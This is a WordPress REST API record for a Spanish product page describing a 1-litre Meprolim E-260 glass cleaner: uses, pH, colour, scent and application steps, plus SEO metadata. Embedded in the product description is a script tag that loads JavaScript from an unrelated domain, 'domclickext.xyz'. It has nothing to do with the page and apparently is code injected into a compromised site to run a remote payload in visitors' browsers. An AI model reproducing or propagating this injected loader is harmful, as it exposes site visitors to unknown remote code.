{"id":10109,"date":"2019-09-10T09:47:34","date_gmt":"2019-09-10T08:47:34","guid":{"rendered":"http:\/\/www.meprolim.es\/?post_type=product&#038;p=10109"},"modified":"2023-05-26T15:14:04","modified_gmt":"2023-05-26T14:14:04","slug":"bote-1l-limpiacristales-meprolim-e-260","status":"publish","type":"product","link":"https:\/\/meprolim.es\/de\/producto\/quimicos-y-articulos-de-limpieza\/productos-quimicos-industriales-de-2\/detergentes-limpiacristales-de-2\/bote-1l-limpiacristales-meprolim-e-260\/","title":{"rendered":"BOTE 1L LIMPIACRISTALES MEPROLIM E-260 &#8211; C\u00d3DIGO: FR2048"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column][vc_column_text]<\/p>\n<p style=\"text-align: justify;\">Producto especialmente indicado para la limpieza de cristales, espejos, azulejos, electrodom\u00e9sticos, TV, ordenadores, etc. Elimina f\u00e1cilmente la suciedad disolvi\u00e9ndola. Poder antiest\u00e1tico que le hace ideal para la limpieza de TV y ordenadores, a su vez este ingrediente confiere a las superficies limpiadas un poder antivaho. Los cristales y espejos quedan perfectamente transparentes y brillantes. Apto para uso alimentario.<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<ul>\n<li>pH 6-8.<\/li>\n<li>Bote de 1 litro.<\/li>\n<li>Producto especialmente indicado para la limpieza de cristales, espejos, azulejos, electrodom\u00e9sticos, TV, ordenadores,&#8230;<\/li>\n<li>Elimina f\u00e1cilmente la suciedad disolvi\u00e9ndola.<\/li>\n<li>Poder antiest\u00e1tico que le hace ideal para la limpieza de TV y ordenadores, a su vez este ingrediente confiere a las superficies limpiadas un poder antivaho.<\/li>\n<li>Los cristales y espejos quedan perfectamente transparentes y brillantes.<\/li>\n<li>APTO PARA USO ALIMENTARIO.<\/li>\n<li>Producto l\u00edquido.<\/li>\n<li>Color: azul.<\/li>\n<li>Perfume: vainilla.<\/li>\n<li>Pulverizar el producto por la superficie a limpiar y pasar un trapo o gamuza.<\/li>\n<li>Finalmente pasar un trapo o pa\u00f1o, seco y limpio, para secar la superficie.<\/li>\n<\/ul>\n<p><strong>SKU: FR2048<\/strong><\/p>\n","protected":false},"featured_media":10101,"template":"","meta":[],"product_brand":[],"product_cat":[903,652,94],"product_tag":[358,654],"class_list":{"0":"post-10109","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-detergentes-limpiacristales","7":"product_cat-productos-quimicos-industriales","8":"product_cat-quimicos-articulos-limpieza","9":"product_tag-limpieza-de-cristales","10":"product_tag-productos-quimicos","12":"first","13":"instock","14":"shipping-taxable","15":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>BOTE 1L LIMPIACRISTALES MEPROLIM E-260 - C\u00d3DIGO: FR2048 - Meprolim<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergentes-limpiacristales\/bote-1l-limpiacristales-meprolim-e-260\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"BOTE 1L LIMPIACRISTALES MEPROLIM E-260 - C\u00d3DIGO: FR2048 - Meprolim\" \/>\n<meta property=\"og:description\" content=\"pH 6-8.  Bote de 1 litro.  Producto especialmente indicado para la limpieza de cristales, espejos, azulejos, electrodom\u00e9sticos, TV, ordenadores,...  Elimina f\u00e1cilmente la suciedad disolvi\u00e9ndola.  Poder antiest\u00e1tico que le hace ideal para la limpieza de TV y ordenadores, a su vez este ingrediente confiere a las superficies limpiadas un poder antivaho.  Los cristales y espejos quedan perfectamente transparentes y brillantes.  APTO PARA USO ALIMENTARIO.  Producto l\u00edquido.  Color: azul.  Perfume: vainilla.  Pulverizar el producto por la superficie a limpiar y pasar un trapo o gamuza.  Finalmente pasar un trapo o pa\u00f1o, seco y limpio, para secar la superficie.  SKU: FR2048\" \/>\n<meta property=\"og:url\" content=\"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergentes-limpiacristales\/bote-1l-limpiacristales-meprolim-e-260\/\" \/>\n<meta property=\"og:site_name\" content=\"Meprolim\" \/>\n<meta property=\"article:modified_time\" content=\"2023-05-26T14:14:04+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/FR0012.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"768\" \/>\n\t<meta property=\"og:image:height\" content=\"768\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data1\" content=\"1\u00a0Minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/detergentes-limpiacristales\\\/bote-1l-limpiacristales-meprolim-e-260\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/detergentes-limpiacristales\\\/bote-1l-limpiacristales-meprolim-e-260\\\/\",\"name\":\"BOTE 1L LIMPIACRISTALES MEPROLIM E-260 - C\u00d3DIGO: FR2048 - Meprolim\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/detergentes-limpiacristales\\\/bote-1l-limpiacristales-meprolim-e-260\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/detergentes-limpiacristales\\\/bote-1l-limpiacristales-meprolim-e-260\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/FR0012.jpg\",\"datePublished\":\"2019-09-10T08:47:34+00:00\",\"dateModified\":\"2023-05-26T14:14:04+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/detergentes-limpiacristales\\\/bote-1l-limpiacristales-meprolim-e-260\\\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/detergentes-limpiacristales\\\/bote-1l-limpiacristales-meprolim-e-260\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/detergentes-limpiacristales\\\/bote-1l-limpiacristales-meprolim-e-260\\\/#primaryimage\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/FR0012.jpg\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/FR0012.jpg\",\"width\":768,\"height\":768},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/detergentes-limpiacristales\\\/bote-1l-limpiacristales-meprolim-e-260\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/meprolim.es\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cat\u00e1logo\",\"item\":\"https:\\\/\\\/meprolim.es\\\/de\\\/catalogo\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"BOTE 1L LIMPIACRISTALES MEPROLIM E-260 &#8211; C\u00d3DIGO: FR2048\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"name\":\"Meprolim\",\"description\":\"Cavas Catalanas S.L.\",\"publisher\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\",\"name\":\"Meprolim\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"width\":401,\"height\":162,\"caption\":\"Meprolim\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"BOTE 1L LIMPIACRISTALES MEPROLIM E-260 - C\u00d3DIGO: FR2048 - Meprolim","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergentes-limpiacristales\/bote-1l-limpiacristales-meprolim-e-260\/","og_locale":"de_DE","og_type":"article","og_title":"BOTE 1L LIMPIACRISTALES MEPROLIM E-260 - C\u00d3DIGO: FR2048 - Meprolim","og_description":"pH 6-8.  Bote de 1 litro.  Producto especialmente indicado para la limpieza de cristales, espejos, azulejos, electrodom\u00e9sticos, TV, ordenadores,...  Elimina f\u00e1cilmente la suciedad disolvi\u00e9ndola.  Poder antiest\u00e1tico que le hace ideal para la limpieza de TV y ordenadores, a su vez este ingrediente confiere a las superficies limpiadas un poder antivaho.  Los cristales y espejos quedan perfectamente transparentes y brillantes.  APTO PARA USO ALIMENTARIO.  Producto l\u00edquido.  Color: azul.  Perfume: vainilla.  Pulverizar el producto por la superficie a limpiar y pasar un trapo o gamuza.  Finalmente pasar un trapo o pa\u00f1o, seco y limpio, para secar la superficie.  SKU: FR2048","og_url":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergentes-limpiacristales\/bote-1l-limpiacristales-meprolim-e-260\/","og_site_name":"Meprolim","article_modified_time":"2023-05-26T14:14:04+00:00","og_image":[{"width":768,"height":768,"url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/FR0012.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Gesch\u00e4tzte Lesezeit":"1\u00a0Minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergentes-limpiacristales\/bote-1l-limpiacristales-meprolim-e-260\/","url":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergentes-limpiacristales\/bote-1l-limpiacristales-meprolim-e-260\/","name":"BOTE 1L LIMPIACRISTALES MEPROLIM E-260 - C\u00d3DIGO: FR2048 - Meprolim","isPartOf":{"@id":"https:\/\/meprolim.es\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergentes-limpiacristales\/bote-1l-limpiacristales-meprolim-e-260\/#primaryimage"},"image":{"@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergentes-limpiacristales\/bote-1l-limpiacristales-meprolim-e-260\/#primaryimage"},"thumbnailUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/FR0012.jpg","datePublished":"2019-09-10T08:47:34+00:00","dateModified":"2023-05-26T14:14:04+00:00","breadcrumb":{"@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergentes-limpiacristales\/bote-1l-limpiacristales-meprolim-e-260\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergentes-limpiacristales\/bote-1l-limpiacristales-meprolim-e-260\/"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergentes-limpiacristales\/bote-1l-limpiacristales-meprolim-e-260\/#primaryimage","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/FR0012.jpg","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/FR0012.jpg","width":768,"height":768},{"@type":"BreadcrumbList","@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergentes-limpiacristales\/bote-1l-limpiacristales-meprolim-e-260\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/meprolim.es\/de\/"},{"@type":"ListItem","position":2,"name":"Cat\u00e1logo","item":"https:\/\/meprolim.es\/de\/catalogo\/"},{"@type":"ListItem","position":3,"name":"BOTE 1L LIMPIACRISTALES MEPROLIM E-260 &#8211; C\u00d3DIGO: FR2048"}]},{"@type":"WebSite","@id":"https:\/\/meprolim.es\/fr\/#website","url":"https:\/\/meprolim.es\/fr\/","name":"Meprolim","description":"Cavas Catalanas S.L.","publisher":{"@id":"https:\/\/meprolim.es\/fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/meprolim.es\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https:\/\/meprolim.es\/fr\/#organization","name":"Meprolim","url":"https:\/\/meprolim.es\/fr\/","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","width":401,"height":162,"caption":"Meprolim"},"image":{"@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/meprolim.es\/de\/wp-json\/wp\/v2\/product\/10109","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/meprolim.es\/de\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/meprolim.es\/de\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/meprolim.es\/de\/wp-json\/wp\/v2\/media\/10101"}],"wp:attachment":[{"href":"https:\/\/meprolim.es\/de\/wp-json\/wp\/v2\/media?parent=10109"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/meprolim.es\/de\/wp-json\/wp\/v2\/product_brand?post=10109"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/meprolim.es\/de\/wp-json\/wp\/v2\/product_cat?post=10109"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/meprolim.es\/de\/wp-json\/wp\/v2\/product_tag?post=10109"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}